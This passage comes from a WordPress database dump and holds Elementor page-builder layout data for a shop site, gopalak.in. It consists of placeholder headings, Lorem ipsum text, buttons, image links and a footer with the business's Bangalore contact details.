Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8610,1502,'_elementor_page_assets','a:0:{}'),(8612,1503,'_elementor_edit_mode','builder'),(8613,1503,'_elementor_template_type','wp-page'),(8614,1503,'_elementor_version','3.7.7'),(8615,1503,'_wp_page_template','elementor_canvas'),(8616,1503,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\